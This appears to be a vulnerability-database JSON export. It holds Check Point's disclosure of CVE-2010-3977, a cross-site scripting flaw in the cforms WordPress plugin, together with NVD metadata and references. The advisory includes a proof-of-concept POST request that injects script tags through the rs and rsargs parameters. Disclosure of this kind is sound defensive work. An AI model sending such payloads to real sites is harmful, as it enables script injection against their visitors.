{"id": "SECURITYVULNS:DOC:25042", "bulletinFamily": "software", "title": "cforms WordPress Plugin Cross Site Scripting Vulnerability - CVE-2010-3977", "description": "Dear List,\r\n\r\nI'm writing on behalf of the Check Point Vulnerability Discovery Team to publish\r\nthe following vulnerability.\r\n\r\n\r\n\r\nCheck Point Software Technologies - Vulnerability Discovery Team (VDT)\r\nhttp://www.checkpoint.com/defense/\r\n\r\ncforms WordPress Plugin Cross Site Scripting Vulnerability\r\nCVE-2010-3977\r\n\r\n\r\nINTRODUCTION\r\n\r\nAccording to Delicious Days, "cforms is a powerful and feature rich form plugin\r\nfor WordPress, offering convenient deployment of multiple Ajax \r\ndriven contact forms throughout your blog or even on the same page."\r\n\r\nThis problem was confirmed in the following versions of the cforms WordPress\r\nPlugin, other versions \r\nmaybe also affected.\r\n\r\ncforms v11.5\r\n\r\n\r\nCVSS Scoring System\r\n\r\nThe CVSS score is: 5.5\r\n Base Score: 6.7\r\n Temporal Score: 5.5\r\nWe used the following values to calculate the scores:\r\n Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N\r\n Temporal score is: E:F/RL:OF/RC:C\r\n\r\n\r\nDETAILS\r\n\r\nA data array is created in lib_ajax.php using values from a form field in a POST\r\nrequest. The parameters rs and rsargs are not validated and thus\r\nit is possible to inject code.\r\n\r\nRequest:\r\nhttp://<server>/wp-content/plugins/cforms/lib_ajax.php\r\nPOST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1\r\nHost: <server>\r\nUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:\r\n1.9.2.10) Gecko/20100914 Firefox/3.6.10\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 219\r\nCookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do\r\n%26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce\r\n%26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do\r\n%26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765;\r\nc o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8\r\n2 3 8 8 f 6 = t e s t ;\r\ncomment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam\r\n%40checkpoint.com\r\nPragma: no-cache\r\nCache-Control: no-cache\r\nrs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#\r\n$<script>alert(1)</script>$#$rbranco_nospam@checkpoint.com$#$http://\r\nwww.checkpoint.com$#$<script>alert(1)</script>\r\n\r\n\r\n\r\nCREDITS\r\n\r\nThis vulnerability has been brought to our attention by Wagner Elias from Conviso\r\nIT Security company (http://www.conviso.com.br) and researched internally by\r\nRodrigo Rubira Branco from the Check Point Vulnerability Discovery Team (VDT).\r\n\r\n\r\n\r\n\r\nBest Regards,\r\n \r\nRodrigo.\r\n \r\n--\r\nRodrigo Rubira Branco\r\nSenior Security Researcher\r\nVulnerability Discovery Team (VDT)\r\nCheck Point Software Technologies", "published": "2010-11-02T00:00:00", "modified": "2010-11-02T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25042", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2010-3977"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:37", "edition": 1, "viewCount": 36, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2018-08-31T11:10:37", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-3977"]}, {"type": "jvn", "idList": ["JVN:35256978"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B", "WPVDB-ID:8782"]}, {"type": "seebug", "idList": ["SSV:20225"]}, {"type": "nessus", "idList": ["CFORMS_RS_XSS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801628"]}, {"type": "exploitdb", "idList": ["EDB-ID:34946"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:95395"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11223"]}], "modified": "2018-08-31T11:10:37", "rev": 2}, "vulnersScore": 6.1}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}

{"cve": [{"id": "CVE-2010-3977", "bulletinFamily": "NVD", "title": "CVE-2010-3977", "description": "Multiple cross-site scripting (XSS) vulnerabilities in wp-content/plugins/cforms/lib_ajax.php in cforms WordPress plugin 11.5 allow remote attackers to inject arbitrary web script or HTML via the (1) rs and (2) rsargs[] parameters.", "published": "2010-11-03T13:37:00", "modified": "2018-10-10T20:06:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3977", "reporter": "cve@mitre.org", "references": ["http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/", "http://www.securityfocus.com/bid/44587", "http://www.securityfocus.com/archive/1/514579/100/0/threaded", "https://exchange.xforce.ibmcloud.com/vulnerabilities/62938", "http://secunia.com/advisories/42006"], "cvelist": ["CVE-2010-3977"], "type": "cve", "lastseen": "2021-04-21T20:54:24", "history": [{"bulletin": {"affectedSoftware": [{"name": "deliciousdays cforms", "operator": "eq", "version": "11.5"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:deliciousdays:cforms:11.5"], "cpe23": [], "cvelist": ["CVE-2010-3977"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {}, "cwe": ["CWE-79"], "description": "Multiple cross-site scripting (XSS) vulnerabilities in wp-content/plugins/cforms/lib_ajax.php in cforms WordPress plugin 11.5 allow remote attackers to inject arbitrary web script or HTML via the (1) rs and (2) rsargs[] parameters.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:10:31", "references": [{"idList": ["SSV:20225"], "type": "seebug"}, {"idList": ["CFORMS_RS_XSS.NASL"], "type": "nessus"}, {"idList": ["SECURITYVULNS:DOC:25042", "SECURITYVULNS:VULN:11223"], "type": "securityvulns"}, {"idList": ["OPENVAS:1361412562310801628"], "type": "openvas"}, {"idList": ["EDB-ID:34946"], "type": "exploitdb"}, {"idList": ["WPVDB-ID:8782"], "type": "wpvulndb"}, {"idList": ["PACKETSTORM:95395"], "type": "packetstorm"}, {"idList": ["JVN:35256978"], "type": "jvn"}], "rev": 2}, "score": {"modified": "2019-05-29T18:10:31", "rev": 2, "value": 4.4, "vector": "NONE"}}, "hash": "88ef0af82f68cbf18387a4854738f6fe7127075be4224c6011eebd429554fef9", "hashmap": [{"hash": "25131d66a9f3961140b068f4b41aa42b", "key": "cvss2"}, {"hash": "c6ff018a937140632fc2c6a94612984b", "key": "published"}, {"hash": "21c1ce3fdffed16a992da5ec9e6d7f1c", "key": "affectedSoftware"}, {"hash": "adb0bfdbb9525a60a233dc63bc8aefd2", "key": "references"}, {"hash": "32ef06be4e0a3eda2dad116a2b0c4698", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "24b9de688e7c9a27ad8f08d023cd5726", "key": "cvelist"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "60204ef70e5a0c311d94fdbe315c5bdd", "key": "href"}, {"hash": "76dcefeb610a1546e1b1f45b1bbf0f5f", "key": "modified"}, {"hash": "a1352dfd2f2de51e079481428b4de302", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "ba45cfc72606742f9e55c4aec9238741", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3977", "id": "CVE-2010-3977", "lastseen": "2019-05-29T18:10:31", "modified": "2018-10-10T20:06:00", "objectVersion": "1.3", "published": "2010-11-03T13:37:00", "references": ["http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/", "http://www.securityfocus.com/bid/44587", "http://www.securityfocus.com/archive/1/514579/100/0/threaded", "https://exchange.xforce.ibmcloud.com/vulnerabilities/62938", "http://secunia.com/advisories/42006"], "reporter": "cve@mitre.org", "title": "CVE-2010-3977", "type": "cve", "viewCount": 2}, "differentElements": ["cpe23", "affectedSoftware"], "edition": 1, "lastseen": "2019-05-29T18:10:31"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "deliciousdays:cforms", "name": "deliciousdays cforms", "operator": "eq", "version": "11.5"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:deliciousdays:cforms:11.5"], "cpe23": ["cpe:2.3:a:deliciousdays:cforms:11.5:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2010-3977"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {}, "cwe": ["CWE-79"], "description": "Multiple cross-site scripting (XSS) vulnerabilities in wp-content/plugins/cforms/lib_ajax.php in cforms WordPress plugin 11.5 allow remote attackers to inject arbitrary web script or HTML via the (1) rs and (2) rsargs[] parameters.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T13:56:16", "references": [{"idList": ["SSV:20225"], "type": "seebug"}, {"idList": ["CFORMS_RS_XSS.NASL"], "type": "nessus"}, {"idList": ["SECURITYVULNS:DOC:25042", "SECURITYVULNS:VULN:11223"], "type": "securityvulns"}, {"idList": ["OPENVAS:1361412562310801628"], "type": "openvas"}, {"idList": ["EDB-ID:34946"], "type": "exploitdb"}, {"idList": ["WPVDB-ID:8782"], "type": "wpvulndb"}, {"idList": ["PACKETSTORM:95395"], "type": "packetstorm"}, {"idList": ["JVN:35256978"], "type": "jvn"}], "rev": 2}, "score": {"modified": "2020-09-21T13:56:16", "rev": 2, "value": 4.4, "vector": "NONE"}}, "hash": "82df80fb0d5c6b7e4da092383836434abba83a0da0cafd793e4a65eadb31a476", "hashmap": [{"hash": "25131d66a9f3961140b068f4b41aa42b", "key": "cvss2"}, {"hash": "c6ff018a937140632fc2c6a94612984b", "key": "published"}, {"hash": "adb0bfdbb9525a60a233dc63bc8aefd2", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "32ef06be4e0a3eda2dad116a2b0c4698", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "52497fe260f560d7c344104ac1696cc0", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "24b9de688e7c9a27ad8f08d023cd5726", "key": "cvelist"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "60204ef70e5a0c311d94fdbe315c5bdd", "key": "href"}, {"hash": "76dcefeb610a1546e1b1f45b1bbf0f5f", "key": "modified"}, {"hash": "a1352dfd2f2de51e079481428b4de302", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "643c7a2739681a38e6069499a36d0749", "key": "affectedSoftware"}, {"hash": "ba45cfc72606742f9e55c4aec9238741", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3977", "id": "CVE-2010-3977", "lastseen": "2020-09-21T13:56:16", "modified": "2018-10-10T20:06:00", "objectVersion": "1.3", "published": "2010-11-03T13:37:00", "references": ["http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/", "http://www.securityfocus.com/bid/44587", "http://www.securityfocus.com/archive/1/514579/100/0/threaded", "https://exchange.xforce.ibmcloud.com/vulnerabilities/62938", "http://secunia.com/advisories/42006"], "reporter": "cve@mitre.org", "title": "CVE-2010-3977", "type": "cve", "viewCount": 2}, "differentElements": ["affectedConfiguration", "cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T13:56:16"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "wordpress:wordpress", "name": "wordpress", "operator": "eq", "version": "*"}], "affectedSoftware": [{"cpeName": "deliciousdays:cforms", "name": "deliciousdays cforms", "operator": "eq", "version": "11.5"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:deliciousdays:cforms:11.5"], "cpe23": ["cpe:2.3:a:deliciousdays:cforms:11.5:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:deliciousdays:cforms:11.5:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2010-3977"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {}, "cwe": ["CWE-79"], "description": "Multiple cross-site scripting (XSS) vulnerabilities in wp-content/plugins/cforms/lib_ajax.php in cforms WordPress plugin 11.5 allow remote attackers to inject arbitrary web script or HTML via the (1) rs and (2) rsargs[] parameters.", "edition": 4, "enchantments": {"dependencies": {"modified": "2021-02-02T05:45:03", "references": [{"idList": ["SSV:20225"], "type": "seebug"}, {"idList": ["WPVDB-ID:8782", "WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B"], "type": "wpvulndb"}, {"idList": ["CFORMS_RS_XSS.NASL"], "type": "nessus"}, {"idList": ["SECURITYVULNS:DOC:25042", "SECURITYVULNS:VULN:11223"], "type": "securityvulns"}, {"idList": ["OPENVAS:1361412562310801628"], "type": "openvas"}, {"idList": ["EDB-ID:34946"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:95395"], "type": "packetstorm"}, {"idList": ["JVN:35256978"], "type": "jvn"}], "rev": 2}, "score": {"modified": "2021-02-02T05:45:03", "rev": 2, "value": 4.4, "vector": "NONE"}}, "extraReferences": [{"name": "44587", "refsource": "BID", "tags": ["Exploit"], "url": "http://www.securityfocus.com/bid/44587"}, {"name": "20101030 cforms WordPress Plugin Cross Site Scripting Vulnerability - CVE-2010-3977", "refsource": "BUGTRAQ", "tags": [], "url": "http://www.securityfocus.com/archive/1/514579/100/0/threaded"}, {"name": "42006", "refsource": "SECUNIA", "tags": ["Vendor Advisory"], "url": "http://secunia.com/advisories/42006"}, {"name": "cforms-libajax-xss(62938)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/62938"}, {"name": "http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/", "refsource": "MISC", "tags": ["Vendor Advisory"], "url": "http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/"}], "hash": "78241a65c70848616c864b84076caf1c6fc39f05a7a44d5c24cc7a6ca773c7d8", "hashmap": [{"hash": "25131d66a9f3961140b068f4b41aa42b", "key": "cvss2"}, {"hash": "c6ff018a937140632fc2c6a94612984b", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "adb0bfdbb9525a60a233dc63bc8aefd2", "key": "references"}, {"hash": "32ef06be4e0a3eda2dad116a2b0c4698", "key": "title"}, {"hash": "52497fe260f560d7c344104ac1696cc0", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "24b9de688e7c9a27ad8f08d023cd5726", "key": "cvelist"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "60204ef70e5a0c311d94fdbe315c5bdd", "key": "href"}, {"hash": "12da677add1e831798e3cd075f58cf00", "key": "cpeConfiguration"}, {"hash": "76dcefeb610a1546e1b1f45b1bbf0f5f", "key": "modified"}, {"hash": "a1352dfd2f2de51e079481428b4de302", "key": "description"}, {"hash": "b4457f35a267e98b6d30167a0c799a25", "key": "extraReferences"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "643c7a2739681a38e6069499a36d0749", "key": "affectedSoftware"}, {"hash": "53ebc3cbfe1d7ae6ae005ab4ebacc61c", "key": "affectedConfiguration"}, {"hash": "ba45cfc72606742f9e55c4aec9238741", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3977", "id": "CVE-2010-3977", "immutableFields": [], "lastseen": "2021-02-02T05:45:03", "modified": "2018-10-10T20:06:00", "objectVersion": "1.5", "published": "2010-11-03T13:37:00", "references": ["http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/", "http://www.securityfocus.com/bid/44587", "http://www.securityfocus.com/archive/1/514579/100/0/threaded", "https://exchange.xforce.ibmcloud.com/vulnerabilities/62938", "http://secunia.com/advisories/42006"], "reporter": "cve@mitre.org", "title": "CVE-2010-3977", "type": "cve", "viewCount": 5}, "different_elements": ["cpeConfiguration"], "edition": 4, "lastseen": "2021-02-02T05:45:03"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "wordpress:wordpress", "name": "wordpress", "operator": "eq", "version": "*"}], "affectedSoftware": [{"cpeName": "deliciousdays:cforms", "name": "deliciousdays cforms", "operator": "eq", "version": "11.5"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:deliciousdays:cforms:11.5"], "cpe23": ["cpe:2.3:a:deliciousdays:cforms:11.5:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:deliciousdays:cforms:11.5:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2010-3977"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {}, "cwe": ["CWE-79"], "description": "Multiple cross-site scripting (XSS) vulnerabilities in wp-content/plugins/cforms/lib_ajax.php in cforms WordPress plugin 11.5 allow remote attackers to inject arbitrary web script or HTML via the (1) rs and (2) rsargs[] parameters.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-03T11:57:30", "references": [{"idList": ["SSV:20225"], "type": "seebug"}, {"idList": ["CFORMS_RS_XSS.NASL"], "type": "nessus"}, {"idList": ["SECURITYVULNS:DOC:25042", "SECURITYVULNS:VULN:11223"], "type": "securityvulns"}, {"idList": ["OPENVAS:1361412562310801628"], "type": "openvas"}, {"idList": ["EDB-ID:34946"], "type": "exploitdb"}, {"idList": ["WPVDB-ID:8782"], "type": "wpvulndb"}, {"idList": ["PACKETSTORM:95395"], "type": "packetstorm"}, {"idList": ["JVN:35256978"], "type": "jvn"}], "rev": 2}, "score": {"modified": "2020-10-03T11:57:30", "rev": 2, "value": 4.4, "vector": "NONE"}}, "extraReferences": [], "hash": "009601695d57c64fe4ad40a415cf6e4256d40ad9bf87be0681230c40d98b5e0d", "hashmap": [{"hash": "25131d66a9f3961140b068f4b41aa42b", "key": "cvss2"}, {"hash": "c6ff018a937140632fc2c6a94612984b", "key": "published"}, {"hash": "adb0bfdbb9525a60a233dc63bc8aefd2", "key": "references"}, {"hash": "32ef06be4e0a3eda2dad116a2b0c4698", "key": "title"}, {"hash": "52497fe260f560d7c344104ac1696cc0", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "24b9de688e7c9a27ad8f08d023cd5726", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "60204ef70e5a0c311d94fdbe315c5bdd", "key": "href"}, {"hash": "12da677add1e831798e3cd075f58cf00", "key": "cpeConfiguration"}, {"hash": "76dcefeb610a1546e1b1f45b1bbf0f5f", "key": "modified"}, {"hash": "a1352dfd2f2de51e079481428b4de302", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "643c7a2739681a38e6069499a36d0749", "key": "affectedSoftware"}, {"hash": "53ebc3cbfe1d7ae6ae005ab4ebacc61c", "key": "affectedConfiguration"}, {"hash": "ba45cfc72606742f9e55c4aec9238741", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3977", "id": "CVE-2010-3977", "lastseen": "2020-10-03T11:57:30", "modified": "2018-10-10T20:06:00", "objectVersion": "1.3", "published": "2010-11-03T13:37:00", "references": ["http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/", "http://www.securityfocus.com/bid/44587", "http://www.securityfocus.com/archive/1/514579/100/0/threaded", "https://exchange.xforce.ibmcloud.com/vulnerabilities/62938", "http://secunia.com/advisories/42006"], "reporter": "cve@mitre.org", "title": "CVE-2010-3977", "type": "cve", "viewCount": 4}, "differentElements": ["extraReferences"], "edition": 3, "lastseen": "2020-10-03T11:57:30"}], "edition": 5, "hashmap": [{"key": "affectedConfiguration", "hash": "53ebc3cbfe1d7ae6ae005ab4ebacc61c"}, {"key": "affectedSoftware", "hash": "643c7a2739681a38e6069499a36d0749"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "ba45cfc72606742f9e55c4aec9238741"}, {"key": "cpe23", "hash": "52497fe260f560d7c344104ac1696cc0"}, {"key": "cpeConfiguration", "hash": "0a09576482254b42da9cd55653a231a7"}, {"key": "cvelist", "hash": "24b9de688e7c9a27ad8f08d023cd5726"}, {"key": "cvss", "hash": "f74a1c24e49a5ecb0eefb5e51d4caa14"}, {"key": "cvss2", "hash": "25131d66a9f3961140b068f4b41aa42b"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "34e69e045b64924bccf865d56b6918a2"}, {"key": "description", "hash": "a1352dfd2f2de51e079481428b4de302"}, {"key": "extraReferences", "hash": "b4457f35a267e98b6d30167a0c799a25"}, {"key": "href", "hash": "60204ef70e5a0c311d94fdbe315c5bdd"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "76dcefeb610a1546e1b1f45b1bbf0f5f"}, {"key": "published", "hash": "c6ff018a937140632fc2c6a94612984b"}, {"key": "references", "hash": "adb0bfdbb9525a60a233dc63bc8aefd2"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "32ef06be4e0a3eda2dad116a2b0c4698"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "124942b9652d152912b85304d55aa689d432da65bf04078e136590d4660c32fe", "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25042", "SECURITYVULNS:VULN:11223"]}, {"type": "seebug", "idList": ["SSV:20225"]}, {"type": "jvn", "idList": ["JVN:35256978"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801628"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:95395"]}, {"type": "exploitdb", "idList": ["EDB-ID:34946"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B"]}, {"type": "nessus", "idList": ["CFORMS_RS_XSS.NASL"]}], "modified": "2021-04-21T20:54:24", "rev": 2}, "score": {"value": 4.4, "vector": "NONE", "modified": "2021-04-21T20:54:24", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:deliciousdays:cforms:11.5"], "affectedSoftware": [{"cpeName": "deliciousdays:cforms", "name": "deliciousdays cforms", "operator": "eq", "version": "11.5"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {}, "cpe23": ["cpe:2.3:a:deliciousdays:cforms:11.5:*:*:*:*:*:*:*"], "cwe": ["CWE-79"], "scheme": null, "affectedConfiguration": [{"cpeName": "wordpress:wordpress", "name": "wordpress", "operator": "eq", "version": "*"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:deliciousdays:cforms:11.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "extraReferences": [{"name": "44587", "refsource": "BID", "tags": ["Exploit"], "url": "http://www.securityfocus.com/bid/44587"}, {"name": "20101030 cforms WordPress Plugin Cross Site Scripting Vulnerability - CVE-2010-3977", "refsource": "BUGTRAQ", "tags": [], "url": "http://www.securityfocus.com/archive/1/514579/100/0/threaded"}, {"name": "42006", "refsource": "SECUNIA", "tags": ["Vendor Advisory"], "url": "http://secunia.com/advisories/42006"}, {"name": "cforms-libajax-xss(62938)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/62938"}, {"name": "http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/", "refsource": "MISC", "tags": ["Vendor Advisory"], "url": "http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/"}], "immutableFields": []}], "seebug": [{"sourceData": "\n Request:\r\n\r\nhttp://&lt;server&gt;/wp-content/plugins/cforms/lib_ajax.php\r\n\r\nPOST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1\r\n\r\nHost: 